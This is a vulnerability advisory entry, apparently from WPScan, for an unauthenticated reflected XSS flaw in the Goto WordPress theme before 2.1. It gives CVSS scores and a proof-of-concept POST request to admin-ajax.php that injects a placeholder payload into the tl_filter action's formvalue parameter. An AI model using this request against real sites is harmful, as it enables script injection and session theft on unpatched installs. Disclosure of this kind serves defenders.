Lucene search

K
wpvulndbTruoc PhanWPVDB-ID:A64A3B2E-7924-47AA-96E8-3AA02A6CDCCC
HistoryMay 04, 2021 - 12:00 a.m.

Goto < 2.1 - Reflected Cross-Site Scripting (XSS)

2021-05-0400:00:00
Truoc Phan
wpscan.com
5

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

4.3 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

The theme did not properly sanitize the formvalue JSON POST parameter in its tl_filter AJAX action, leading to an unauthenticated Reflected Cross-site Scripting (XSS) vulnerability.

PoC

POST /wp-admin/admin-ajax.php HTTP/1.1 Accept: / Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 9265 Connection: close action=tl_filter&formvalue;=[{“name”:“keywords”,“value”:“%27%2d%2d+%58%53%53%20%50%41%59%4c%4f%41%44%20%48%45%52%45+%2d%2d%2d%2d%2d%3e++%3c%2d%2d%2d%2d%2d”},{“name”:“date”,“value”:“5/5/2021”},{“name”:“min_days”,“value”:“0”},{“name”:“max_days”,“value”:“70”},{“name”:“min_price”,“value”:“0”},{“name”:“max_price”,“value”:“13538”},{“name”:“avaibility”,“value”:“0”},{“name”:“short_by”,“value”:“newest-to-oldest”},{“name”:“view_type”,“value”:“list”},{“name”:“paged”,“value”:“1”}]

CPENameOperatorVersion
gotolt2.1

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

4.3 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

Related for WPVDB-ID:A64A3B2E-7924-47AA-96E8-3AA02A6CDCCC